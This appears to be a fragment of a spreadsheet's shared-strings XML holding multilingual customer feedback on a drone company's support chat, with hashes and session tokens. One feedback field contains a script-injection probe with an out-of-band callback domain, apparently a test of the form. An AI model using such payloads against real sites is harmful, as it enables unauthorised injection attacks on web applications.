    <t>访客-4d3349</t>
  </si>
  <si>
    <t>schneller an human durchstellen</t>
  </si>
  <si>
    <t>999bc6ebfcfa4941ff7a619f74056557</t>
  </si>
  <si>
    <t>81c7cc335b062665b07e07c721f303e3</t>
  </si>
  <si>
    <t>|82595987301379152188955</t>
  </si>
  <si>
    <t>wJozTdcEUI1/pexmbtiwUtdd9zEI/LTChnybdx456qeDT69W1jYn2dOBuVhhYc4C</t>
  </si>
  <si>
    <t xml:space="preserve">speed of repsonse
</t>
  </si>
  <si>
    <t>8FktwLT2iczmBOnA6Zj80D34v1Iu5gsaMISbAfXfcvo=</t>
  </si>
  <si>
    <t>634d3e916ea03c1b04722749a4a7dcc7</t>
  </si>
  <si>
    <t>en_case02</t>
  </si>
  <si>
    <t>|82595814499913052042079</t>
  </si>
  <si>
    <t>zdcZg+DzqVpOH/7wXkKQztIXoZvGhj4Jr5YKkEp4KSA=</t>
  </si>
  <si>
    <t xml:space="preserve">I was trying to if they was gonna repair  my drone for me </t>
  </si>
  <si>
    <t>sGug6mi7nzdhZkn0AnyHC0JmZrF05xAXJQEuI9/SyU8=</t>
  </si>
  <si>
    <t>c2dc6144d995ca1f1cebb6d4851bd85e</t>
  </si>
  <si>
    <t>|82594747589883884712881</t>
  </si>
  <si>
    <t>1xhgOifOxDuYod1QusINLg==</t>
  </si>
  <si>
    <t xml:space="preserve">I am unable to activate my new NEO i get server error code 0xFFF. very disappointed </t>
  </si>
  <si>
    <t>3z593R1SFRfTJQFWr/8BD5WoOD9OCyxIf9+xDilKHvs=</t>
  </si>
  <si>
    <t>7fe68314e4c772aced2e6c22a942c489</t>
  </si>
  <si>
    <t>|82595586286632440144803</t>
  </si>
  <si>
    <t>nl/Phb2FJMryJ8F3U+er3vrcKaFezehFSei0+48SSb0=</t>
  </si>
  <si>
    <t>I have been trying to purchase DJI care within 48 h and It is the most frustrating experience!</t>
  </si>
  <si>
    <t>nS0sEaYTrCUf0wkqRjJkmUG6JTrnerGUA7mbRixo5yc=</t>
  </si>
  <si>
    <t>fcb3287b6363a5f26926e3fa42520dd8</t>
  </si>
  <si>
    <t>|82595484917549698555188</t>
  </si>
  <si>
    <t>/VV/fpwfvlf6U2aESc2vtpDSN4BOLEPvpR8GfQL4Mx0=</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>월</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 19</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>일에</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>롯데백화점</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>본점에서</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> OSMO ACTION 5 PRO</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>를</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>구입하였습니다</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t>. SITE</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>에서</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>알려준데로</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>활성화</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>과정을</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>진행하고</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>있는데</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> CODE 4</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>자리를</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>받아야</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>하는</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> STEP</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>안됩</t>
    </r>
  </si>
  <si>
    <t>gqVIyS1/7dgl+QthPsEIIBslc+oPg1grnt815MMoUXc=</t>
  </si>
  <si>
    <t>d4b8e7b350521bcb2fe543bb3b5e3207</t>
  </si>
  <si>
    <t>|82594084133038065188570</t>
  </si>
  <si>
    <t>eZel6ZAdPDGZhxRpimSgHA==</t>
  </si>
  <si>
    <t xml:space="preserve">Excelent </t>
  </si>
  <si>
    <t>KYauhcU2GFRmOHhkcisrJYAEI4BLeDpa24kx7akg72k=</t>
  </si>
  <si>
    <t>8cbad28b126f959facc3095257df69f7</t>
  </si>
  <si>
    <t>|82594457973108981638663</t>
  </si>
  <si>
    <t>5fde736c6e021568efe19bf4e214b608</t>
  </si>
  <si>
    <t>|82593428736445700010689</t>
  </si>
  <si>
    <t>3qSaeyd/jVAszD++linzqPL0v85NXAWppdn+hRbihpU=</t>
  </si>
  <si>
    <t>Very</t>
  </si>
  <si>
    <t>c/pxyXXVecWaetyPGl4HlicTGXe0Z2Jm9wzHQ4isnOI=</t>
  </si>
  <si>
    <t>c1c13dbf4a3f68dd2bef563644c26896</t>
  </si>
  <si>
    <t>|82593549554207597789094</t>
  </si>
  <si>
    <t>RWgrO00eqHpnEs/Xj0Q0c/KTndKDwjIpGl3ekGudj24=</t>
  </si>
  <si>
    <t>Does not understand my questions</t>
  </si>
  <si>
    <t>9/7nq24MbRntpqbnJ5tBKX3yBHXj3p9UdB+grQi1s2E=</t>
  </si>
  <si>
    <t>36300f27d6292cef5bb0dd46c37f2843</t>
  </si>
  <si>
    <t>|82592643225906998062377</t>
  </si>
  <si>
    <t>oW2vTXdtLlWaGojYEWWftJfWCvbfIz3wZmzBo7+1j5Q=</t>
  </si>
  <si>
    <t>Had spent 7 minutes typing out helpful and relavent facts to onl have your ap time me out and am now</t>
  </si>
  <si>
    <t>Q+6UdJM/I3E0OULYlRGxoJy8Ch7gMyjFIM6TXpzERW8=</t>
  </si>
  <si>
    <t>9500e5980d5bb30af41ddc7bc7eae47a</t>
  </si>
  <si>
    <t>fb_sp17</t>
  </si>
  <si>
    <t>|82592638697897928874796</t>
  </si>
  <si>
    <t>C8ZlTbXEEhSarvYI6aOuUqc4M3DXNz7M82xC9WOytVY=</t>
  </si>
  <si>
    <t>There are no customer services</t>
  </si>
  <si>
    <t>LjNWyZwW8y2GgNivH4/cj0PayK/kX8lF5VtJVpa7W18=</t>
  </si>
  <si>
    <t>c6ce25f89e3d5a157dfa400bd1e20edd</t>
  </si>
  <si>
    <t>|82592454198223742377805</t>
  </si>
  <si>
    <t>suHpiXWVbftHOZsYG1c26pfLuhrIQxrKLAERcNsYaic=</t>
  </si>
  <si>
    <t>C'était une question simple et la réponse a été satisfaisante.</t>
  </si>
  <si>
    <t>JszMzezHv0jzTmX8SKFnTVJ9iEcRILTXpng1EaMgFAw=</t>
  </si>
  <si>
    <t>8233eb2452a7e3e68bc8a1c395f77319</t>
  </si>
  <si>
    <t>|82591623903455823597149</t>
  </si>
  <si>
    <t>swClotfQUuo5aEJGm9vX0g==</t>
  </si>
  <si>
    <t>I have a Mavic Pro Platinum. I want to fly at night. (FAA 107) requires anti collision STROBE lights</t>
  </si>
  <si>
    <t>St2xVIAuYvZCkZXxKhAArb7Kov+Fj1adeFww0VsKhYY=</t>
  </si>
  <si>
    <t>a25b103552eb5d0017642fefc47e779a</t>
  </si>
  <si>
    <t>|82591885488619025076124</t>
  </si>
  <si>
    <t>mlkZBX1geHGwDsVSIE7liOm2B/Op8Pn+Ck/Z4FzqWoo=</t>
  </si>
  <si>
    <t>Je ne connais toujours pas la date de la livraison de mon colis</t>
  </si>
  <si>
    <t>Ob5qbsI2LV7aF+oELSIqg9CyhVjOQFbfHb9CXfN9f8I=</t>
  </si>
  <si>
    <t>13a9e2bc7867405a40813e4e7df2cc14</t>
  </si>
  <si>
    <t>|82591524778833662079069</t>
  </si>
  <si>
    <t>UuszY2DwaAKhAQuPct5QUguuur7mbf2zl0zz2mJS3JY=</t>
  </si>
  <si>
    <t xml:space="preserve">I think it could be a l.ittle less cumbersom. </t>
  </si>
  <si>
    <t>Q53pzpm38veyYQopBTlOt0j5laFJ79wKqJiLp5ks+1w=</t>
  </si>
  <si>
    <t>da4e4e45408645b2250d7e1322e9d55a</t>
  </si>
  <si>
    <t>es_sp1</t>
  </si>
  <si>
    <t>|82590774908733871239426</t>
  </si>
  <si>
    <t>e3Zod/EVnZEcAMrLPLxQVw==</t>
  </si>
  <si>
    <t>Code 1610002D</t>
  </si>
  <si>
    <t>1uSlNWdxodJuHsvuu7SNurXWY7aYmiyhfMP/Xs0rQYU=</t>
  </si>
  <si>
    <t>185a3fedc291e65694da86e0d55216bf</t>
  </si>
  <si>
    <t>|82590109756299966070471</t>
  </si>
  <si>
    <t>访客-ac41ab</t>
  </si>
  <si>
    <t>Problème résolu facilement</t>
  </si>
  <si>
    <t>33f5dfbf224605491ea94d2795178daa</t>
  </si>
  <si>
    <t>7e9b1018bab180257bf1969f5cf439b2</t>
  </si>
  <si>
    <t>|82589881366103519016682</t>
  </si>
  <si>
    <t>P2C3OlqZozxOZEqZCN3FDw==</t>
  </si>
  <si>
    <t>Good help but there were a few spelling mistakes</t>
  </si>
  <si>
    <t>tTu4o7sctbnFo7z/4CCP8mq8KZ5bneljrafIG7B/aOE=</t>
  </si>
  <si>
    <t>c73bf923bfd66c758fafd89cd7e685f9</t>
  </si>
  <si>
    <t>|82590109019303623179912</t>
  </si>
  <si>
    <t>OrbDTNh0VkkqXXyAZm7lvjjROv3oJXEXtnFBlPBflGI=</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour, sur mon DJI Flip j'ai eu hier l'erreur : Nacelle bloquée code 1D010002. Que dois-je faire </t>
  </si>
  <si>
    <t>L2LqNSv9PN6Wk2cqsYk+PMScD+YHsO3vs+1yGIgnS8U=</t>
  </si>
  <si>
    <t>d4457050924af34bd9d3b8130fa61f81</t>
  </si>
  <si>
    <t>|82589903068674231130209</t>
  </si>
  <si>
    <t>mS00Q+adE6Mk6nhd9Rwx8g==</t>
  </si>
  <si>
    <t xml:space="preserve">Didnt answer my question </t>
  </si>
  <si>
    <t>wa/ycD5eIw4I5urVkuausUZVEGXtyyfU4cLdzdCPbs4=</t>
  </si>
  <si>
    <t>f9ec5089563b4bbeb13d82bdb4cb3deb</t>
  </si>
  <si>
    <t>|82589072751794640018248</t>
  </si>
  <si>
    <t>Z5Lb7YGROSizE5DOwJUvjL46pF3Z9MEUDKn5nr2XDJU=</t>
  </si>
  <si>
    <t>test@example.com"&gt;&lt;script&gt;alert(1)&lt;/script&gt;
ds9zwaa5uzce6i6era44hd1x0o6huei3.oastify.com</t>
  </si>
  <si>
    <t>bI/4R9eZ0W0dSMqn5lpadJV/rh/aYpByvsEfQoqbt/w=</t>
  </si>
  <si>
    <t>1175bbb4f39392afd96e249e7560bb7b</t>
  </si>
  <si>
    <t>|82589512766933868910238</t>
  </si>
  <si>
    <t>wOGTvWH8u7IMObhiz9EQSzO0+DDmVun12gXyzeusJbw=</t>
  </si>
  <si>
    <t>I asked for help and didn't get it</t>
  </si>
  <si>
    <t>9Hoc6Hz9saCPxEpDObRDToA8zbhfyCUwQka6OxQay6g=</t>
  </si>
  <si>
    <t>58af6c25a09c34d14dfdf6687fc7be77</t>
  </si>
  <si>
    <t>|82589740404558091168617</t>
  </si>
  <si>
    <t>tO+bck5sUmQfYNbN/856kEoV6BNAvHMnsMK09YcxRmI=</t>
  </si>
  <si>
    <t>I CANNOT BELIEVE ALL OF THIS DRAMA!</t>
  </si>
  <si>
    <t>0zJY67V3N+UD4b+g0PFKkozV/r4+kvAE/9v3tTDEKDA=</t>
  </si>
  <si>
    <t>0d9deb6706baf4dc070ab65a47fdbb1d</t>
  </si>
  <si>
    <t>|82588190912234573768995</t>
  </si>
  <si>
    <t>jF70y2lXuY583kxK7dZoKw==</t>
  </si>
  <si>
    <t xml:space="preserve">ich konnte gar keine frage stellen. Glatte  6
</t>
  </si>
  <si>
    <t>G0FxlyI/IaYDhI0mrklrIqNIVm9LV3YFgwEUSPi8eRU=</t>
  </si>
  <si>
    <t>0b3d79f142852f54709630f5e51eaa4f</t>
  </si>
  <si>
    <t>|82588093553601339613443</t>
  </si>
  <si>
    <t>vAVHDV7d6xlgJlcaO9c5nQ==</t>
  </si>
  <si>
    <t xml:space="preserve">the phantom 4 was a good drone, but now that you have discontinued support, it is worthless. </t>
  </si>
  <si>
    <t>qMA8XlaCBCDdFQwqep4NSCUZaXdCiwPTrVR1JnjfdBU=</t>
  </si>
  <si>
    <t>9489a40047e94c9597213b2abee5e75e</t>
  </si>
  <si>
    <t>|82587987102367002577255</t>
  </si>
  <si>
    <t>75LLWzY1ythgo4J1lntAMw==</t>
  </si>
  <si>
    <t>I see the explanation of unknown code 180. I hope the issue will be resolved when updating firmware</t>
  </si>
  <si>
    <t>Rw5VgrdAR2uq3JNQIiCWkOsyGmvxGA0Htt6fkWCqs7Q=</t>
  </si>
  <si>
    <t>840d3388c550f1486f70d19f0f6f6340</t>
  </si>
  <si>
    <t>|82588404250179390971592</t>
  </si>
  <si>
    <t>what is going on? I need my drone.</t>
  </si>
  <si>
    <t>bf94b0eac1a3bca6e074dfb051f9dc6c</t>
  </si>
  <si>
    <t>|82587206133409208017466</t>
  </si>
  <si>
    <t>Vbrv29vdfizaHaqKB4dSTg==</t>
  </si>
  <si>
    <t>I can't seem to navigate all the stupid warranty/service options to find the one I paid for.</t>
  </si>
  <si>
    <t>5zzICnq6fDESoEai00qWsSlNVe6tm66fhdWacjdalY4=</t>
  </si>
  <si>
    <t>eb4fbe7b638e2d04a5560204e8933cf1</t>
  </si>
  <si>
    <t>|82587074621206071985267</t>
  </si>
  <si>
    <t>Xgj7IXK1+pZ4xDfjgNtIwg==</t>
  </si>
  <si>
    <t xml:space="preserve">I can't  get a virtual assistant even after several attempts to connect ! </t>
  </si>
  <si>
    <t>1DtG4mH9W/ldvvGspIEHDXY7VY44ytJwmsco/0rWlxk=</t>
  </si>
  <si>
    <t>890ad0f52214993e328d5425dd3a7a2e</t>
  </si>
  <si>
    <t>|82587489235938116757552</t>
  </si>
  <si>
    <t>g9kzj+XblCZaIChvnNfKDA==</t>
  </si>
  <si>
    <t xml:space="preserve">Le temps de réponse et le transfert de vidéo.  Sinon vraiment bien merci. </t>
  </si>
  <si>
    <t>M/RMn7iY81QLjVcwhpZpv7bMhWNG+ECR4CPiXo9NUHQ=</t>
  </si>
  <si>
    <t>78e6636367f3dd9348310a210242f48c</t>
  </si>
  <si>
    <t>|82587412537716326130702</t>
  </si>
  <si>
    <t>PkYh8ACgBt3nr9eU7MxMzQ==</t>
  </si>
  <si>
    <t>The customer service technician was very professional and attentive.  simply cannot give me solution</t>
  </si>
  <si>
    <t>ixSn20MTFn1nnYxWsz7exy+8pcCRt3SnYdmzZnBPErg=</t>
  </si>
  <si>
    <t>01c25e6c0ed04d58c76040c7e725e376</t>
  </si>
  <si>
    <t>|82588821037737834533889</t>
  </si>
  <si>
    <t>XH4YMefjnFOLyzhQLtXIReWJQYAXFfyuw13vMy2B7Vs=</t>
  </si>
  <si>
    <t>Very fast shipping. So far with Three other Mavics are of great quality.</t>
  </si>
  <si>
    <t>jlgoCbJrNimkCTqgJKWTvuiKuSpOa6BT4VmMfT0UAqA=</t>
  </si>
  <si>
    <t>ee9d9bac00294a5151a2387242f93ecd</t>
  </si>
  <si>
    <t>en_careverify01</t>
  </si>
  <si>
    <t>|82586501356816581234123</t>
  </si>
  <si>
    <t>B/hWz2pskxbDkgupmiJQhg==</t>
  </si>
  <si>
    <t xml:space="preserve">I WANT TO GET DJI CARE EXPRESS ON MY AIR 3S WICHT YOU HAVE IN YOUR POSESSION </t>
  </si>
  <si>
    <t>2UUDNCsTdS5ka9G9yKNmP685xlrw8DH/L6L/uZPTz/g=</t>
  </si>
  <si>
    <t>08e69a4048a957670064bba345a9e15d</t>
  </si>
  <si>
    <t>|82584866480588178398735</t>
  </si>
  <si>
    <t>Ek1TucUlIGy/ywIjR1CZ1ciY1GCxd7BFbNqIwLQX5Gk=</t>
  </si>
  <si>
    <t>Not answering...</t>
  </si>
  <si>
    <t>80uyGjc4DAMNrKgKM5Bz1qBxIofoKpGGdylEuuMMhio=</t>
  </si>
  <si>
    <t>025fb49c3590de8b88562f26fdc6f8f5</t>
  </si>
  <si>
    <t>|82585826734162289711335</t>
  </si>
  <si>
    <t>elRjJV1Z8Df7zBaHZszJiPKgQUU6XRm0xkgz42nA0T8=</t>
  </si>
  <si>
    <t xml:space="preserve">Bullshit ai </t>
  </si>
  <si>
    <t>Y2DAQ3pGV8/kRA/xAeegIvgIElwro3Bt8VgKyHPwauU=</t>
  </si>
  <si>
    <t>b08d1e5cadfbe17b953bf4e2722d2b57</t>
  </si>
  <si>
    <t>|82583745384684254977182</t>
  </si>
  <si>
    <t>zFBhcf0aqPttDuEmdcCXWny662mumgu2PBuiaZFIEFw=</t>
  </si>
  <si>
    <t>Toujours aucune réponse après une semaine de déclaration de l'incident...</t>
  </si>
  <si>
    <t>NjI7Z53zw6j23spPz+DMUqVAU9ZWkvBtHPpZsfRwvTE=</t>
  </si>
  <si>
    <t>6280e8830ae501434a969c8852ff2fb4</t>
  </si>
  <si>
    <t>|82583187758146290818697</t>
  </si>
  <si>
    <t>GREAT</t>
  </si>
  <si>
    <t>b71440dc03c1f693e75baaaae6b3dab3</t>
  </si>
  <si>
    <t>es_sp12</t>
  </si>
  <si>
    <t>|82583567315698390725868</t>
  </si>
  <si>
    <t>sNyvpIWjA5T8b59z3U9Vv/N7iWzArNp+RpDSTrUZ9qY=</t>
  </si>
  <si>
    <t>Operador de llamada, horario muy reducido</t>
  </si>
  <si>
    <t>ZgFej4yhTQDRNbWXbJOLV6hHw3SIp3ClRZcUMsZbWdI=</t>
  </si>
  <si>
    <t>197070d5f1cca10d0789ccc4158864a8</t>
  </si>
  <si>
    <t>|82583201315336609497867</t>
  </si>
  <si>
    <t>4fdffdd9cefd4b13c2fd6a902983f92a</t>
  </si>
  <si>
    <t>|82582872784173170677250</t>
  </si>
  <si>
    <t>76p4cYvSFbsU9RoOsZN6Q+dpDeuQuKc0rlFiFR1E994=</t>
  </si>
  <si>
    <t xml:space="preserve">I need to renew the dji care. Please contact me.
Thanks </t>
  </si>
  <si>
    <t>Mgd6Vomz8SGkthW7Px83Gvd3xHyb3HBkagsr5+4ReSk=</t>
  </si>
  <si>
    <t>4f5aac444996f0c941041618143c3417</t>
  </si>
  <si>
    <t>|82582174076148003545274</t>
  </si>
  <si>
    <t>y6wMJL9DiRSc8bJULHO5uWBe/b0rieDUfIbPJZS51+qnuUHBPQIDWos/MNmo17al</t>
  </si>
  <si>
    <t>It cut out whilst I was still typing!</t>
  </si>
  <si>
    <t>zBTyIW+MCC5vrQ7KmwDVkYLSexCOwkjNmugf++68gdE=</t>
  </si>
  <si>
    <t>09dc37b82990209a6738c9b51705f57c</t>
  </si>
  <si>
    <t>|82582365953227117922558</t>
  </si>
  <si>
    <t>GREATE</t>
  </si>
  <si>
    <t>3cc49a5c5e6b0b2062a545f14678b7fd</t>
  </si>
  <si>
    <t>|82582722801248794882495</t>
  </si>
  <si>
    <t>tg0fG3yxvPU7YJgmfhIQiYx0efMu1QvZ9wUuYNmvcwk=</t>
  </si>
  <si>
    <t>poor. didn't answer the questions. These 'assistants' are always utter utter shite.</t>
  </si>
  <si>
    <t>sNdluVZSnL0msMyrhSZokj6ttFG7PZgaZDq2eFV6IO0=</t>
  </si>
  <si>
    <t>0848bc36be9a7020826320c37d2cc5e9</t>
  </si>
  <si>
    <t>|82582774552079694286793</t>
  </si>
  <si>
    <t>3AfKVsdU/T0xHU9O9pTI0Q==</t>
  </si>
  <si>
    <t>Hi, I requested the refund of the payment. I have not received the drone.</t>
  </si>
  <si>
    <t>/AvKur51Zd0pY9JyRhEI15AW+Eugje7iQW4jGje3EP4=</t>
  </si>
  <si>
    <t>1d0b6f362f23740126a2e230bd902ce6</t>
  </si>
  <si>
    <t>|82580906584526995554636</t>
  </si>
  <si>
    <t>CnyGUJ3pwYoz2S+2RHsNzDejeKqsX3Hg1DqLEeLSfyg=</t>
  </si>
  <si>
    <t xml:space="preserve">answered my question short and concise to the point.  </t>
  </si>
  <si>
    <t>QI6QTtwf9zObL+3fE8dZxd2Tk5MEthh4ehJOqSpoXTw=</t>
  </si>
  <si>
    <t>ee694b6e9f286c68acdb025d348fd52f</t>
  </si>
  <si>
    <t>|82580566442272219727354</t>
  </si>
  <si>
    <t>zq9ImHQCkoOx4CLFhri8Ow==</t>
  </si>
  <si>
    <t>Where is my order #0018909021060?</t>
  </si>
  <si>
    <t>b1ONdv/62N66UFYc5jUEI1eG03oqpIPafQlOjEqeATs=</t>
  </si>
  <si>
    <t>fc6fd8410eebecda18c23fcf0ba4096d</t>
  </si>
  <si>
    <t>|82580450785988162651911</t>
  </si>
  <si>
    <t>hwSpBD0OPk/+oOntPjRZ6A68AGemRqzVzKVsngZXa1c=</t>
  </si>
  <si>
    <t>Good. It deleted my text</t>
  </si>
  <si>
    <t>tcyw/fd/qGLzTofbbdjEXE0nvzXfHjWaIrUBgREl70w=</t>
  </si>
  <si>
    <t>c2e72cbf6a432d0e03e588b1eeaefa2d</t>
  </si>
  <si>
    <t>|82579371339608309638995</t>
  </si>
  <si>
    <t>8hLqS+Js0LGXXgKlWd+nPAr86cbL4OMPZS49iYJBP+k=</t>
  </si>
  <si>
    <t>Very quickly attention</t>
  </si>
  <si>
    <t>tQVR8p6jR9WlNkd0mYs3X8ipf1qPba7GV0q9iM+UHaY=</t>
  </si>
  <si>
    <t>22d0f3626f3f44abe1d5e4479093a98f</t>
  </si>
  <si>
    <t>|82579055535514310748001</t>
  </si>
  <si>
    <t>cD7c6qVjFb4ZUQ51jjAESg==</t>
  </si>
  <si>
    <t>Where can I purchase a Mavic 2 pro RC controller battery</t>
  </si>
  <si>
    <t>x9E5ffl2vfq4f+d89J9TZ2mX7MIP1h7p+tlavOxr3cI=</t>
  </si>
  <si>
    <t>4a49c2f3fb23fc553a5ba993a0be1457</t>
  </si>
  <si>
    <t>|82578587377408638045127</t>
  </si>
  <si>
    <t>dnpC8jOa5zir9ADMmaJ/Oxm2oqAPFGt+Ct5QOeTzVJU=</t>
  </si>
  <si>
    <t xml:space="preserve">Still cant fly. Not helpful. </t>
  </si>
  <si>
    <t>IkM67yOq6D1EwsbSjaLSvXpczF8WiLRAcd+cqBddMik=</t>
  </si>
  <si>
    <t>f1a1f0d66e8026a0034d4dc6842edc54</t>
  </si>
  <si>
    <t>|82578267977914060094926</t>
  </si>
  <si>
    <t>Ge38Gw8hQC95GVlhlAX5dKS073A/Qjh5jwycdF18jgI=</t>
  </si>
  <si>
    <t>I need to replace my dji avata 2 with dji care refresh</t>
  </si>
  <si>
    <t>uGs1gPxOxvNQ2wqhj681DBvD6x9eNXkDAEO7Ox8oU9o=</t>
  </si>
  <si>
    <t>b6357f165bd4c306a469b49ac594d7d6</t>
  </si>
  <si>
    <t>na_sp16</t>
  </si>
  <si>
    <t>|82577451576673844871693</t>
  </si>
  <si>
    <t>9G0EGIvufs9hEllySRSXEBjJzWkg8qqXSNbFiEahDGk=</t>
  </si>
  <si>
    <t xml:space="preserve">This chat went nowhere. It just loops back and does not address the issue that brought me here. </t>
  </si>
  <si>
    <t>Fyb4MuKlt1roHjNIdScIOpHmfFqNBg0t6JtQa5Bbzpk=</t>
  </si>
  <si>
    <t>8add18acf67edee0f09f9d29c880c187</t>
  </si>
  <si>
    <t>|82577288172302659221855</t>
  </si>
  <si>
    <t>p0yZTv2biL24QKszjoB1xrhx/BMWETfsdAwM0ZgpQE4=</t>
  </si>
  <si>
    <t>Be more responsive to my question. Don't try to sell me something I don't want.</t>
  </si>
  <si>
    <t>Xa+ha3FfHgFaJR63KYLGmojb5moVl0rsTHqVlOKPvaA=</t>
  </si>
  <si>
    <t>5bcf7899d836edbc06c458892d0bc66e</t>
  </si>
  <si>
    <t>|82577797714654742120008</t>
  </si>
  <si>
    <t>SqGahWxpmPTICcbypQbQ/A==</t>
  </si>
  <si>
    <t xml:space="preserve">I need to talk with real peoples. </t>
  </si>
  <si>
    <t>eWKMAsh4FXMw549qgHUr7wJG/zNeQ3Q04MyjRtj2NNc=</t>
  </si>
  <si>
    <t>6753928741c84ec5722bdf8eef6fdfdc</t>
  </si>
  <si>
    <t>|82576683941933754176050</t>
  </si>
  <si>
    <t>M6byhlCPho+zlhZDrPo/UA==</t>
  </si>
  <si>
    <t>Impossible dentre numéro de série j'ai toute assayer ça marche pas c'est trop compliquer numéro tele</t>
  </si>
  <si>
    <t>KLwalTN5Ok6XD5Hl36corZXNNyjNkyM9MUfzr5KyYI8=</t>
  </si>
  <si>
    <t>3b9999d607cbc088105d251d66d01d91</t>
  </si>
  <si>
    <t>|82576440377749227424518</t>
  </si>
  <si>
    <t>z9UpB6AH7yUmY3BSkK70uA==</t>
  </si>
  <si>
    <t>.</t>
  </si>
  <si>
    <t>hC92/mP6MzzMYprrSwEJ7GBstrk7Ue7mb5qeUxue31Y=</t>
  </si>
  <si>
    <t>a234bb199d4fbf5c73e44b76061b85d5</t>
  </si>
  <si>
    <t>|82576220926956614639451</t>
  </si>
  <si>
    <t>XxRujQvBAhnn9NDzmDo89Q==</t>
  </si>
  <si>
    <t xml:space="preserve">forgot my pass word
</t>
  </si>
  <si>
    <t>MBh8USR3P9nh6iq6u8aSjKkDavOqJzBHzzj2+HcVrGM=</t>
  </si>
  <si>
    <t>511b81db099bb228786be478c40a2b41</t>
  </si>
  <si>
    <t>|82575166231782114182151</t>
  </si>
  <si>
